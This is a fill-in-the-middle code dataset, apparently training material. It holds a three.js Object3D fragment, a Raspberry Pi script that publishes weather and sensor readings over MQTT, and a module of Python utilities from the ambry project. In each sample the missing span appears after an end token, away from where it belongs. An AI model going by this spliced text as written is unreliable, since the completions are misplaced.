return this.rotateOnAxis( v1, angle );
};
}(),
translateOnAxis: function () {
// translate object by distance along axis in object space
// axis is assumed to be normalized
var v1 = new Vector3();
return function translateOnAxis( axis, distance ) {
v1.copy( axis ).applyQuaternion( this.quaternion );
this.position.add( v1.multiplyScalar( distance ) );
return this;
};
}(),
translateX: function () {
var v1 = new Vector3( 1, 0, 0 );
return function translateX( distance ) {
return this.translateOnAxis( v1, distance );
};
}(),
translateY: function () {
var v1 = new Vector3( 0, 1, 0 );
return function translateY( distance ) {
return this.translateOnAxis( v1, distance );
};
}(),
translateZ: function () {
var v1 = new Vector3( 0, 0, 1 );
return function translateZ( distance ) {
return this.translateOnAxis( v1, distance );
};
}(),
localToWorld: function ( vector ) {
return vector.applyMatrix4( this.matrixWorld );
},
worldToLocal: function () {
var m1 = new Matrix4();
return function worldToLocal( vector ) {
return vector.applyMatrix4( m1.getInverse( this.matrixWorld ) );
};
}(),
lookAt: function () {
// This method does not support objects with rotated and/or translated parent(s)
var m1 = new Matrix4();
return function lookAt( vector ) {
if ( this.isCamera ) {
m1.lookAt( this.position, vector, this.up );
} else {
m1.lookAt( vector, this.position, this.up );
}
this.quaternion.setFromRotationMatrix( m1 );
};
}(),
add: function ( object ) {
if ( arguments.length > 1 ) {
for ( var i = 0; i < arguments.length; i ++ ) {
this.add( arguments[ i ] );
}
return this;
}
if ( object === this ) {
console.error( "THREE.Object3D.add: object can't be added as a child of itself.", object );
return this;
}
if ( ( object && object.isObject3D ) ) {
if ( object.parent !== null ) {
object.parent.remove( object );
}
object.parent = this;
object.dispatchEvent( { type: 'added' } );
this.children.push( object );
} else {
console.error( "THREE.Object3D.add: object not an instance of THREE.Object3D.", object );
}
return this;
},
remove: function ( object ) {
if ( arguments.length > 1 ) {
for ( var i = 0; i < arguments.length; i ++ ) {
this.remove( arguments[ i ] );
}
return this;
}
var index = this.children.indexOf( object );
if ( index !== - 1 ) {
object.parent = null;
object.dispatchEvent( { type: 'removed' } );
this.children.splice( index, 1 );
}
return this;
},
getObjectById: function ( id ) {
return this.getObjectByProperty( 'id', id );
},
getObjectByName: function ( name ) {
return this.getObjectByProperty( 'name', name );
},
getObjectByProperty: function ( name, value ) {
if ( this[ name ] === value ) return this;
for ( var i = 0, l = this.children.length; i < l; i ++ ) {
var child = this.children[ i ];
var object = child.getObjectByProperty( name, value );
if ( object !== undefined ) {
return object;
}
}
return undefined;
},
getWorldPosition: function ( optionalTarget ) {
var result = optionalTarget || new Vector3();
this.updateMatrixWorld( true );
return result.setFromMatrixPosition( this.matrixWorld );
},
getWorldQuaternion: function () {
var position = new Vector3();
var scale = new Vector3();
return function getWorldQuaternion( optionalTarget ) {
var result = optionalTarget || new Quaternion();
this.updateMatrixWorld( true );
this.matrixWorld.decompose( position, result, scale );
return result;
};
}(),
getWorldRotation: function () {
var quaternion = new Quaternion();
return function getWorldRotation( optionalTarget ) {
var result = optionalTarget || new Euler();
this.getWorldQuaternion( quaternion );
return result.setFromQuaternion( quaternion, this.rotation.order, false );
};
}(),
getWorldScale: function () {
var position = new Vector3();
var quaternion = new Quaternion();
return function getWorldScale( optionalTarget ) {
var result = optionalTarget || new Vector3();
this.updateMatrixWorld( true );
this.matrixWorld.decompose( position, quaternion, result );
return result;
};
}(),
getWorldDirection: function () {
var quaternion = new Quaternion();
return function getWorldDirection( optionalTarget ) {
var result = optionalTarget || new Vector3();
this.getWorldQuaternion( quaternion );
return result.set( 0, 0, 1 ).applyQuaternion( quaternion );
};
}(),
raycast: function () {},
traverse: function ( callback ) {
callback( this );
var children = this.children;
for ( var i = 0, l = children.length; i < l; i ++ ) {
children[ i ].traverse( callback );
}
},
traverseVisible: function ( callback ) {
if ( this.visible === false ) return;
callback( this );
var children = this.children;
for ( var i = 0, l = children.length; i < l; i ++ ) {
children[ i ].traverseVisible( callback );
}
},
traverseAncestors: function ( callback ) {
var parent = this.parent;
if ( parent !== null ) {
callback( parent );
parent.traverseAncestors( callback );
}
},
updateMatrix: function () {
this.matrix.compose( this.position, this.quaternion, this.scale );
this.matrixWorldNeedsUpdate = true;
},
updateMatrixWorld: function ( force ) {
if ( this.matrixAutoUpdate ) this.updateMatrix();
if ( this.matrixWorldNeedsUpdate || force ) {
if ( this.parent === null ) {
this.matrixWorld.copy( this.matrix );
} else {
this.matrixWorld.multiplyMatrices( this.parent.matrixWorld, this.matrix );
}
this.matrixWorldNeedsUpdate = false;
force = true;
}
// update children
var children = this.children;
for ( var i = 0, l = children.length; i < l; i ++ ) {
children[ i ].updateMatrixWorld( force );
}
},
toJSON: function ( meta ) {
// meta is '' when called from JSON.stringify
var isRootObject = ( meta === undefined || meta === '' );
var output = {};
// meta is a hash used to collect geometries, materials.
// not providing it implies that this is the root object
// being serialized.
if ( isRootObject ) {
// initialize meta obj
meta = {
geometries: {},
materials: {},
textures: {},
images: {}
};
output.metadata = {
version: 4.5,
type: 'Object',
generator: 'Object3D.toJSON'
};
}
// standard Object3D serialization
var object = {};
object.uuid = this.uuid;
object.type = this.type;
if ( this.name !== '' ) object.name = this.name;
if ( this.castShadow === true ) object.castShadow = true;
if ( this.receiveShadow === true ) object.receiveShadow = true;
if ( this.visible === false ) object.visible = false;
if ( JSON.stringify( this.userData ) !== '{}' ) object.userData = this.userData;
object.matrix = this.matrix.toArray();
//
function serialize( library, element ) {
if ( library[ element.uuid ] === undefined ) {
library[ element.uuid ] = element.toJSON( meta );
}
return element.uuid;
}<|fim▁hole|>
object.geometry = serialize( meta.geometries, this.geometry );
}
if ( this.material !== undefined ) {
if ( Array.isArray( this.material ) ) {
var uuids = [];
for ( var i = 0, l = this.material.length; i < l; i ++ ) {
uuids.push( serialize( meta.materials, this.material[ i ] ) );
}
object.material = uuids;
} else {
object.material = serialize( meta.materials, this.material );
}
}
//
if ( this.children.length > 0 ) {
object.children = [];
for ( var i = 0; i < this.children.length; i ++ ) {
object.children.push( this.children[ i ].toJSON( meta ).object );
}
}
if ( isRootObject ) {
var geometries = extractFromCache( meta.geometries );
var materials = extractFromCache( meta.materials );
var textures = extractFromCache( meta.textures );
var images = extractFromCache( meta.images );
if ( geometries.length > 0 ) output.geometries = geometries;
if ( materials.length > 0 ) output.materials = materials;
if ( textures.length > 0 ) output.textures = textures;
if ( images.length > 0 ) output.images = images;
}
output.object = object;
return output;
// extract data from the cache hash
// remove metadata on each item
// and return as array
function extractFromCache( cache ) {
var values = [];
for ( var key in cache ) {
var data = cache[ key ];
delete data.metadata;
values.push( data );
}
return values;
}
},
clone: function ( recursive ) {
return new this.constructor().copy( this, recursive );
},
copy: function ( source, recursive ) {
if ( recursive === undefined ) recursive = true;
this.name = source.name;
this.up.copy( source.up );
this.position.copy( source.position );
this.quaternion.copy( source.quaternion );
this.scale.copy( source.scale );
this.matrix.copy( source.matrix );
this.matrixWorld.copy( source.matrixWorld );
this.matrixAutoUpdate = source.matrixAutoUpdate;
this.matrixWorldNeedsUpdate = source.matrixWorldNeedsUpdate;
this.layers.mask = source.layers.mask;
this.visible = source.visible;
this.castShadow = source.castShadow;
this.receiveShadow = source.receiveShadow;
this.frustumCulled = source.frustumCulled;
this.renderOrder = source.renderOrder;
this.userData = JSON.parse( JSON.stringify( source.userData ) );
if ( recursive === true ) {
for ( var i = 0; i < source.children.length; i ++ ) {
var child = source.children[ i ];
this.add( child.clone() );
}
}
return this;
}
} );
export { Object3D };<|fim▁end|> |
if ( this.geometry !== undefined ) { |
<|file_name|>weatherpublisher.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
import time
import json
import requests
from datetime import datetime
import paho.mqtt.client as mqtt
from sense_hat import SenseHat
BROKER_URL = '192.168.24.25'
CYCLE_TIME = 10
# initialisiere SenseHat-Erweiterung
sense = SenseHat()
sense.low_light = True
def get_location():
"""Ermittelt die Stadt zur eigenen IP-Adresse."""
IP_LOCKUP_URL = "https://ipinfo.io/"<|fim▁hole|> data = json.loads(r.text)
return data['city']
def get_weather(city):
"""Fragt das aktuelle Wetter bei openweathermap.org ab und gibt Temperatur,
Luftfeuchtigkeit, Windgeschwindigkeit und die Zeiten von Sonnenaufgang und
Sonnenuntergang zurück."""
URL = 'http://api.openweathermap.org/data/2.5/weather?q={}&APPID={}'
API_KEY = '' # <- insert API key for openweathermap.org
r = requests.get(URL.format(city, API_KEY))
data = json.loads(r.text)
if data['cod'] == '404':
return '', 0, 0, 0, '', ''
weather = data['weather'][0]['main']
temp = data['main']['temp'] - 273.15
humidity = data['main']['humidity']
wind_speed = data['wind']['speed']
sunrise = datetime.fromtimestamp(data['sys']['sunrise'])
sunset = datetime.fromtimestamp(data['sys']['sunset'])
return weather, temp, humidity, wind_speed, sunrise, sunset
if __name__ == '__main__':
try:
mqttc = mqtt.Client()
mqttc.connect(BROKER_URL, 1883, 60)
while True:
weather, temp, humidity, wind_speed, sunrise, sunset = get_weather(get_location())
mqttc.publish('umgebung/wetter', str(weather))
mqttc.publish('umgebung/temperatur', str(temp))
mqttc.publish('umgebung/luftfeuchtigkeit', str(humidity))
mqttc.publish('umgebung/windgeschwindigkeit', str(wind_speed))
mqttc.publish('umgebung/sonnenaufgang', str(sunrise))
mqttc.publish('umgebung/sonnenuntergang', str(sunset))
mqttc.publish('wohnzimmer/temperatur', str(sense.get_temperature()))
mqttc.publish('wohnzimmer/luftdruck', str(sense.get_pressure()))
mqttc.publish('wohnzimmer/luftfeuchtigkeit', str(sense.get_humidity()))
# überprüfe, ob das Steuerkreuz nach unten gedrückt wurde
for event in sense.stick.get_events():
if 'down' in event.direction:
exit()
time.sleep(CYCLE_TIME)
except KeyboardInterrupt:
mqttc.disconnect()
sense.clear()
print('Tschüß!')<|fim▁end|> | try:
r = requests.get(IP_LOCKUP_URL)
except:
print("error while querying info...") |
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>"""Misc support code.
Copyright (c) 2015 Civic Knowledge. This file is licensed under the terms of
the Revised BSD License, included in this distribution as LICENSE.txt
"""
from collections import OrderedDict, defaultdict, Mapping, deque, MutableMapping, Callable
from functools import partial, reduce, wraps
import json
import hashlib
import logging
import os
import pprint
import re
import subprocess
import sys
from time import time
import yaml
from yaml.representer import RepresenterError
import warnings
from bs4 import BeautifulSoup
from six.moves import filterfalse, xrange as six_xrange
from six import iteritems, iterkeys, itervalues, print_, StringIO
from six.moves.urllib.parse import urlparse, urlsplit, urlunsplit
from six.moves.urllib.request import urlopen
from ambry.dbexceptions import ConfigurationError
logger_init = set()
def get_logger(name, file_name=None, stream=None, template=None, propagate=False, level=None):
"""Get a logger by name.
"""
logger = logging.getLogger(name)
running_tests = (
'test' in sys.argv # running with setup.py
or sys.argv[0].endswith('py.test')) # running with py.test
if running_tests and not level:
# testing without level, this means tester does not want to see any log messages.
level = logging.CRITICAL
if not level:
level = logging.INFO
logger.setLevel(level)
logger.propagate = propagate
formatter = logging.Formatter(template)
if not stream:
stream = sys.stdout
logger.handlers = []
handler = logging.StreamHandler(stream=stream)
handler.setFormatter(formatter)
logger.addHandler(handler)
if file_name:
handler = logging.FileHandler(file_name)
handler.setFormatter(logging.Formatter('%(asctime)s '+template))
logger.addHandler(handler)
return logger
# From https://wiki.python.org/moin/PythonDecoratorLibrary#Memoize
def memoize(obj):
cache = obj.cache = {}
@wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
def expiring_memoize(obj):
"""Like memoize, but forgets after 10 seconds."""
cache = obj.cache = {}
last_access = obj.last_access = defaultdict(int)
@wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if last_access[key] and last_access[key] + 10 < time():
if key in cache:
del cache[key]
last_access[key] = time()
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
class Counter(dict):
"""Mapping where default values are zero."""
def __missing__(self, key):
return 0
# Stolen from:
# http://code.activestate.com/recipes/498245-lru-and-lfu-cache-decorators/
def lru_cache(maxsize=128, maxtime=60):
'''Least-recently-used cache decorator.
Arguments to the cached function must be hashable.
Cache performance statistics stored in f.hits and f.misses.
Clear the cache with f.clear().
http://en.wikipedia.org/wiki/Cache_algorithms#Least_Recently_Used
'''
maxqueue = maxsize * 10
# @ReservedAssignment
def decorating_function(
user_function,
len=len,
iter=iter,
tuple=tuple,
sorted=sorted,
KeyError=KeyError):
cache = {} # mapping of args to results
queue = deque() # order that keys have been used
refcount = Counter() # times each key is in the queue
sentinel = object() # marker for looping around the queue
kwd_mark = object() # separate positional and keyword args
# lookup optimizations (ugly but fast)
queue_append, queue_popleft = queue.append, queue.popleft
queue_appendleft, queue_pop = queue.appendleft, queue.pop
@wraps(user_function)
def wrapper(*args, **kwds):
# cache key records both positional and keyword args
key = args
if kwds:
key += (kwd_mark,) + tuple(sorted(kwds.items()))
# record recent use of this key
queue_append(key)
refcount[key] += 1
# get cache entry or compute if not found
try:
result, expire_time = cache[key]
if expire_time and time() > expire_time:
raise KeyError('Expired')
wrapper.hits += 1
except KeyError:
result = user_function(*args, **kwds)
if maxtime:
expire_time = time() + maxtime
else:
expire_time = None
cache[key] = result, expire_time
wrapper.misses += 1
# purge least recently used cache entry
if len(cache) > maxsize:
key = queue_popleft()
refcount[key] -= 1
while refcount[key]:
key = queue_popleft()
refcount[key] -= 1
del cache[key], refcount[key]
# periodically compact the queue by eliminating duplicate keys
# while preserving order of most recent access
if len(queue) > maxqueue:
refcount.clear()
queue_appendleft(sentinel)
for key in filterfalse(refcount.__contains__, iter(queue_pop, sentinel)):
queue_appendleft(key)
refcount[key] = 1
return result
def clear():
cache.clear()
queue.clear()
refcount.clear()
wrapper.hits = wrapper.misses = 0
wrapper.hits = wrapper.misses = 0
wrapper.clear = clear
return wrapper
return decorating_function
class YamlIncludeLoader(yaml.Loader):
def __init__(self, stream):
self._root = os.path.split(stream.name)[0]
super(YamlIncludeLoader, self).__init__(stream)
# From http://pypi.python.org/pypi/layered-yaml-attrdict-config/12.07.1
class OrderedDictYAMLLoader(yaml.Loader):
'Based on: https://gist.github.com/844388'
def __init__(self, *args, **kwargs):
yaml.Loader.__init__(self, *args, **kwargs)
self.dir = None
for a in args:
try:
self.dir = os.path.dirname(a.name)
except:
pass
self.add_constructor(
'tag:yaml.org,2002:map',
type(self).construct_yaml_map)
self.add_constructor(
'tag:yaml.org,2002:omap',
type(self).construct_yaml_map)
self.add_constructor('!include', OrderedDictYAMLLoader.include)
def construct_yaml_map(self, node):
data = OrderedDict()
yield data
value = self.construct_mapping(node)
data.update(value)
def construct_mapping(self, node, deep=False):
if isinstance(node, yaml.MappingNode):
self.flatten_mapping(node)
else:
raise yaml.constructor.ConstructorError(
None,
None,
'expected a mapping node, but found {}'.format(
node.id),
node.start_mark)
mapping = OrderedDict()
for key_node, value_node in node.value:
key = self.construct_object(key_node, deep=deep)
try:
hash(key)
except TypeError as exc:
raise yaml.constructor.ConstructorError(
'while constructing a mapping',
node.start_mark,
'found unacceptable key ({})'.format(exc),
key_node.start_mark)
value = self.construct_object(value_node, deep=deep)
mapping[key] = value
return mapping
def include(self, node):
if not self.dir:
return "ConfigurationError: Can't include file: wasn't able to set base directory"
relpath = self.construct_scalar(node)
abspath = os.path.join(self.dir, relpath)
if not os.path.exists(abspath):
raise ConfigurationError(
"Can't include file '{}': Does not exist".format(abspath))
with open(abspath, 'r') as f:
parts = abspath.split('.')
ext = parts.pop()
if ext == 'yaml':
return yaml.load(f, OrderedDictYAMLLoader)
else:
return IncludeFile(abspath, relpath, f.read())
# IncludeFile and include_representer ensures that when config files are re-written, they are
# represented as an include, not the contents of the include
class IncludeFile(str):
def __new__(cls, abspath, relpath, data):
s = str.__new__(cls, data)
s.abspath = abspath
s.relpath = relpath
return s
def include_representer(dumper, data):
return dumper.represent_scalar('!include', data.relpath)
# http://pypi.python.org/pypi/layered-yaml-attrdict-config/12.07.1
class AttrDict(OrderedDict):
def __init__(self, *argz, **kwz):
super(AttrDict, self).__init__(*argz, **kwz)
def __setitem__(self, k, v):
super(AttrDict, self).__setitem__(k, AttrDict(v) if isinstance(v, Mapping) else v)
def __getattr__(self, k):
if not (k.startswith('__') or k.startswith('_OrderedDict__')):
return self[k]
else:
return super(AttrDict, self).__getattr__(k)
def __setattr__(self, k, v):
if k.startswith('_OrderedDict__'):
return super(AttrDict, self).__setattr__(k, v)
self[k] = v
def __iter__(self):
return iterkeys(super(OrderedDict, self))
##
# __enter__ and __exit__ allow for assigning a path to a variable
# with 'with', which isn't extra functionalm but looks pretty.
##
def __enter__(self):
return self
def __exit__(self, type_, value, traceback):
return False
@classmethod
def from_yaml(cls, path, if_exists=False):
if if_exists and not os.path.exists(path):
return cls()
with open(path) as f:
return cls(yaml.load(f, OrderedDictYAMLLoader) or {})
@staticmethod
def flatten_dict(data, path=tuple()):
dst = list()
for k, v in iteritems(data):
k = path + (k,)
if isinstance(v, Mapping):
for v in v.flatten(k):
dst.append(v)
else:
dst.append((k, v))
return dst
def flatten(self, path=tuple()):
return self.flatten_dict(self, path=path)
def update_flat(self, val):
if isinstance(val, AttrDict):
val = val.flatten()
for k, v in val:
dst = self
for slug in k[:-1]:
if dst.get(slug) is None:
dst[slug] = AttrDict()
dst = dst[slug]
if v is not None or not isinstance(dst.get(k[-1]), Mapping):
dst[k[-1]] = v
def unflatten_row(self, k, v):
dst = self
for slug in k[:-1]:
if slug is None:
continue
if dst.get(slug) is None:
dst[slug] = AttrDict()
dst = dst[slug]
if v is not None or not isinstance(dst.get(k[-1]), Mapping):
dst[k[-1]] = v
def update_yaml(self, path):
self.update_flat(self.from_yaml(path))
return self
def to_dict(self):
root = {}
val = self.flatten()
for k, v in val:
dst = root
for slug in k[:-1]:
if dst.get(slug) is None:
dst[slug] = dict()
dst = dst[slug]
if v is not None or not isinstance(dst.get(k[-1]), Mapping):
dst[k[-1]] = v
return root
def update_dict(self, data):
self.update_flat(self.flatten_dict(data))
def clone(self):
clone = AttrDict()
clone.update_dict(self)
return clone
def rebase(self, base):
base = base.clone()
base.update_dict(self)
self.clear()
self.update_dict(base)
def dump(self, stream=None, map_view=None):
from ambry.metadata.proptree import _ScalarTermS, _ScalarTermU
from ambry.orm import MutationList, MutationDict # cross-module import
yaml.representer.SafeRepresenter.add_representer(
MapView, yaml.representer.SafeRepresenter.represent_dict)
yaml.representer.SafeRepresenter.add_representer(
AttrDict, yaml.representer.SafeRepresenter.represent_dict)
yaml.representer.SafeRepresenter.add_representer(
OrderedDict, yaml.representer.SafeRepresenter.represent_dict)
yaml.representer.SafeRepresenter.add_representer(
defaultdict, yaml.representer.SafeRepresenter.represent_dict)
yaml.representer.SafeRepresenter.add_representer(
MutationDict, yaml.representer.SafeRepresenter.represent_dict)
yaml.representer.SafeRepresenter.add_representer(
set, yaml.representer.SafeRepresenter.represent_list)
yaml.representer.SafeRepresenter.add_representer(
MutationList, yaml.representer.SafeRepresenter.represent_list)
yaml.representer.SafeRepresenter.add_representer(
IncludeFile, include_representer)
yaml.representer.SafeRepresenter.add_representer(
_ScalarTermS, yaml.representer.SafeRepresenter.represent_str)
yaml.representer.SafeRepresenter.add_representer(
_ScalarTermU, yaml.representer.SafeRepresenter.represent_str)
if stream is None:
stream = StringIO()
d = self
if map_view is not None:
map_view.inner = d
d = map_view
try:
yaml.safe_dump(d, stream, default_flow_style=False, indent=4, encoding='utf-8')
except RepresenterError:
pprint.pprint(self.to_dict())
raise
if isinstance(stream, StringIO):
return stream.getvalue()
def json(self):
o = yaml.load(self.dump())
return json.dumps(o)
class MapView(MutableMapping):
"""A map that provides a limited view on an underlying, inner map. Iterating over the
view retrns only the keys specified in the keys argument. """
_inner = None
_keys = None
def __init__(self, d=None, keys=None):
self._inner = d
self._keys = keys
@property
def inner(self):
return self._inner
@inner.setter
def inner(self, value):
self._inner = value
def __getitem__(self, key):
return self._inner.__getitem__(key)
def __setitem__(self, key, value):
raise NotImplementedError()
return self._inner.__setitem__(key, value)
def __delitem__(self, key):
return self._inner.__delitem__(key)
def __len__(self):
return self._inner.__len__()
def __iter__(self):
for k in self._inner:
if not self._keys or k in self._keys:
yield k
def __getattr__(self, item):
return getattr(self._inner, item)
class CaseInsensitiveDict(Mapping): # http://stackoverflow.com/a/16202162
def __init__(self, d):
self._d = d
self._s = dict((k.lower(), k) for k in d)
def __contains__(self, k):
return k.lower() in self._s
def __len__(self):
return len(self._s)
def __iter__(self):
return iter(self._s)
def __getitem__(self, k):
return self._d[self._s[k.lower()]]
def __setitem__(self, k, v):
self._d[k] = v
self._s[k.lower()] = k
def pop(self, k):
k0 = self._s.pop(k.lower())
return self._d.pop(k0)
def actual_key_case(self, k):
return self._s.get(k.lower())
def lowercase_dict(d):
return dict((k.lower(), v) for k, v in iteritems(d))
def configure_logging(cfg, custom_level=None):
"""Don't know what this is for ...."""
import itertools as it
import operator as op
if custom_level is None:
custom_level = logging.WARNING
for entity in it.chain.from_iterable(it.imap(op.methodcaller('viewvalues'),
[cfg] + [cfg.get(k, dict()) for k in ['handlers', 'loggers']])):
if isinstance(entity, Mapping) and entity.get('level') == 'custom':
entity['level'] = custom_level
logging.config.dictConfig(cfg)
logging.captureWarnings(cfg.warnings)
# {{{ http://code.activestate.com/recipes/578272/ (r1)
def toposort(data):
"""Dependencies are expressed as a dictionary whose keys are items and
whose values are a set of dependent items. Output is a list of sets in
topological order. The first set consists of items with no dependences,
each subsequent set consists of items that depend upon items in the
preceeding sets.
>>> print '\\n'.join(repr(sorted(x)) for x in toposort2({
... 2: set([11]),
... 9: set([11,8]),
... 10: set([11,3]),
... 11: set([7,5]),
... 8: set([7,3]),
... }) )
[3, 5, 7]
[8, 11]
[2, 9, 10]
"""
# Ignore self dependencies.
for k, v in iteritems(data):
v.discard(k)
# Find all items that don't depend on anything.
extra_items_in_deps = reduce(
set.union, itervalues(data)) - set(data.keys())
# Add empty dependences where needed
data.update({item: set() for item in extra_items_in_deps})
while True:
ordered = set(item for item, dep in iteritems(data) if not dep)
if not ordered:
break
yield ordered
data = {item: (dep - ordered)
for item, dep in iteritems(data)
if item not in ordered}
assert not data, 'Cyclic dependencies exist among these items:\n%s' % '\n'.join(
repr(x) for x in list(data.items()))
# end of http://code.activestate.com/recipes/578272/ }}}
def md5_for_stream(f, block_size=2 ** 20):
md5 = hashlib.md5()
while True:
data = f.read(block_size)
if not data:
break
md5.update(data)
return md5.hexdigest()
def md5_for_file(f, block_size=2 ** 20):
"""Generate an MD5 has for a possibly large file by breaking it into
chunks."""
md5 = hashlib.md5()
try:
# Guess that f is a FLO.
f.seek(0)
return md5_for_stream(f, block_size=block_size)
except AttributeError:
# Nope, not a FLO. Maybe string?
file_name = f
with open(file_name, 'rb') as f:
return md5_for_file(f, block_size)
def make_acro(past, prefix, s): # pragma: no cover
"""Create a three letter acronym from the input string s.
Args:
past: A set object, for storing acronyms that have already been created
prefix: A prefix added to the acronym before storing in the set
s: The string to create the acronym from.
"""
def _make_acro(s, t=0):
"""Make an acronym of s for trial t"""
# Really should cache these ...
v = ['a', 'e', 'i', 'o', 'u', 'y']
c = [chr(x) for x in six_xrange(ord('a'), ord('z') + 1) if chr(x) not in v]
s = re.sub(r'\W+', '', s.lower())
vx = [x for x in s if x in v] # Vowels in input string
cx = [x for x in s if x in c] # Consonants in input string
if s.startswith('Mc'):
if t < 1:
return 'Mc' + v[0]
if t < 2:
return 'Mc' + c[0]
if s[0] in v: # Starts with a vowel
if t < 1:
return vx[0] + cx[0] + cx[1]
if t < 2:
return vx[0] + vx[1] + cx[0]
if s[0] in c and s[1] in c: # Two first consonants
if t < 1:
return cx[0] + cx[1] + vx[0]
if t < 2:
return cx[0] + cx[1] + cx[2]
if t < 3:
return cx[0] + vx[0] + cx[1]
if t < 4:
return cx[0] + cx[1] + cx[2]
if t < 5:
return cx[0] + vx[0] + vx[1]
if t < 6:
return cx[0] + cx[1] + cx[-1]
# These are punts; just take a substring
if t < 7:
return s[0:3]
if t < 8:
return s[1:4]
if t < 9:
return s[2:5]
if t < 10:
return s[3:6]
return None
for t in six_xrange(11): # Try multiple forms until one isn't in the past acronyms
try:
a = _make_acro(s, t)
if a is not None:
if prefix:
aps = prefix + a
else:
aps = a
if aps not in past:
past.add(aps)
return a
except IndexError:
pass
raise Exception('Could not get acronym.')
def ensure_dir_exists(path):
"""Given a file, ensure that the path to the file exists"""
import os
f_dir = os.path.dirname(path)
if not os.path.exists(f_dir):
os.makedirs(f_dir)
return f_dir
def walk_dict(d):
"""Walk a tree (nested dicts).
For each 'path', or dict, in the tree, returns a 3-tuple containing:
(path, sub-dicts, values)
where:
* path is the path to the dict
* sub-dicts is a tuple of (key,dict) pairs for each sub-dict in this dict
* values is a tuple of (key,value) pairs for each (non-dict) item in this dict
"""
# nested dict keys
nested_keys = tuple(k for k in list(d.keys()) if isinstance(d[k], dict))
# key/value pairs for non-dicts
items = tuple((k, d[k]) for k in list(d.keys()) if k not in nested_keys)
# return path, key/sub-dict pairs, and key/value pairs
yield ('/', [(k, d[k]) for k in nested_keys], items)
# recurse each subdict
for k in nested_keys:
for res in walk_dict(d[k]):
# for each result, stick key in path and pass on
res = ('/%s' % k + res[0], res[1], res[2])
yield res
def init_log_rate(output_f, N=None, message='', print_rate=None):
"""Initialze the log_rate function. Returnas a partial function to call for
each event.
If N is not specified but print_rate is specified, the initial N is
set to 100, and after the first message, the N value is adjusted to
emit print_rate messages per second
"""
if print_rate and not N:
N = 100
if not N:
N = 5000
d = [0, # number of items processed
time(), # start time. This one gets replaced after first message
N, # ticker to next message
N, # frequency to log a message
message,
print_rate,
deque([], maxlen=4) # Deque for averaging last N rates
]
assert isinstance(output_f, Callable)
f = partial(_log_rate, output_f, d)
f.always = output_f
f.count = lambda: d[0]
return f
def _log_rate(output_f, d, message=None):
"""Log a message for the Nth time the method is called.
d is the object returned from init_log_rate
"""
if d[2] <= 0:
if message is None:
message = d[4]
# Average the rate over the length of the deque.
d[6].append(int(d[3] / (time() - d[1])))
rate = sum(d[6]) / len(d[6])
# Prints the processing rate in 1,000 records per sec.
output_f(message + ': ' + str(rate) + '/s ' + str(d[0] / 1000) + 'K ')
d[1] = time()
# If the print_rate was specified, adjust the number of records to
# aproximate that rate.
if d[5]:
target_rate = rate * d[5]
d[3] = int((target_rate + d[3]) / 2)
d[2] = d[3]
d[0] += 1
d[2] -= 1
class Progressor(object):
"""Progress reporter suitable for calling in Library.get()
Example: r = l.get(args.term, cb=Progressor().progress)
"""
start = None
last = None
freq = 5
def __init__(self, message='Download', printf=print_):
self.start = time.clock()
self.message = message
self.rates = deque(maxlen=10)
self.printf = printf
def progress(self, i, n):
now = time.clock()
if not self.last:
self.last = now
if now - self.last > self.freq:
diff = now - self.start
self.last = now
i_rate = float(i) / diff
self.rates.append(i_rate)
if len(self.rates) > self.rates.maxlen / 2:
rate = sum(self.rates) / len(self.rates)
rate_type = 'a'
else:
rate = i_rate
rate_type = 'i'
msg = '{}: Compressed: {} Mb. Downloaded, Uncompressed: {:6.2f} Mb, {:5.2f} Mb / s ({})'\
.format(
self.message, int(int(n) / (1024 * 1024)),
round(float(i) / (1024. * 1024.), 2),
round(float(rate) / (1024 * 1024), 2), rate_type)
self.printf(msg)
# http://stackoverflow.com/a/1695250
# >>> Numbers = enum('ZERO', 'ONE', TWO = 20, THREE = 30)
# >>> print Numbers.ONE
# >>> print Numbers.THREE
def enum(*sequential, **named):
enums = dict(list(zip(sequential, list(six_xrange(len(sequential))))), **named)
return type('Enum', (), enums)
class Constant:
"""Organizes constants in a class."""
class ConstError(TypeError):
pass
def __setattr__(self, name, value):
if name in self.__dict__:
raise self.ConstError("Can't rebind const(%s)" % name)
self.__dict__[name] = value
def count_open_fds():
"""return the number of open file descriptors for current process.
.. warning: will only work on UNIX-like os-es.
http://stackoverflow.com/a/7142094
"""
pid = os.getpid()
procs = subprocess.check_output(
['lsof', '-w', '-Ff', '-p', str(pid)])
nprocs = len(
[s for s in procs.split('\n') if s and s[0] == 'f' and s[1:].isdigit()]
)
return nprocs
def parse_url_to_dict(url):
"""Parse a url and return a dict with keys for all of the parts.
The urlparse function() returns a wacky combination of a namedtuple
with properties.
"""
p = urlparse(url)
return {
'scheme': p.scheme,
'netloc': p.netloc,
'path': p.path,
'params': p.params,
'query': p.query,
'fragment': p.fragment,
'username': p.username,
'password': p.password,
'hostname': p.hostname,
'port': p.port
}
def unparse_url_dict(d):
if 'hostname' in d and d['hostname']:
host_port = d['hostname']
else:
host_port = ''
if 'port' in d and d['port']:
host_port += ':' + str(d['port'])
user_pass = ''
if 'username' in d and d['username']:
user_pass += d['username']
if 'password' in d and d['password']:
user_pass += ':' + d['password']
if user_pass:
host_port = '{}@{}'.format(user_pass, host_port)
url = '{}://{}/{}'.format(d.get('scheme', 'http'),
host_port, d.get('path', '').lstrip('/'))
if 'query' in d and d['query']:
url += '?' + d['query']
return url
def set_url_part(url, **kwargs):
"""Change one or more parts of a URL"""
d = parse_url_to_dict(url)
d.update(kwargs)
return unparse_url_dict(d)
def filter_url(url, **kwargs):
"""filter a URL by returning a URL with only the parts specified in the keywords"""
d = parse_url_to_dict(url)
d.update(kwargs)
return unparse_url_dict({k: v for k, v in list(d.items()) if v})
def select_from_url(url, key):
d = parse_url_to_dict(url)
return d.get(key)
def normalize_newlines(string):
"""Convert \r\n or \r to \n."""
return re.sub(r'(\r\n|\r|\n)', '\n', string)
def print_yaml(o):
"""Pretty print an object as YAML."""
print(yaml.dump(o, default_flow_style=False, indent=4, encoding='utf-8'))
def qualified_class_name(o):
"""Full name of an object, including the module"""
module = o.__class__.__module__
if module is None or module == str.__class__.__module__:
return o.__class__.__name__
return module + '.' + o.__class__.__name__
def qualified_name(cls):
"""Full name of a class, including the module. Like qualified_class_name, but when you already have a class """
module = cls.__module__
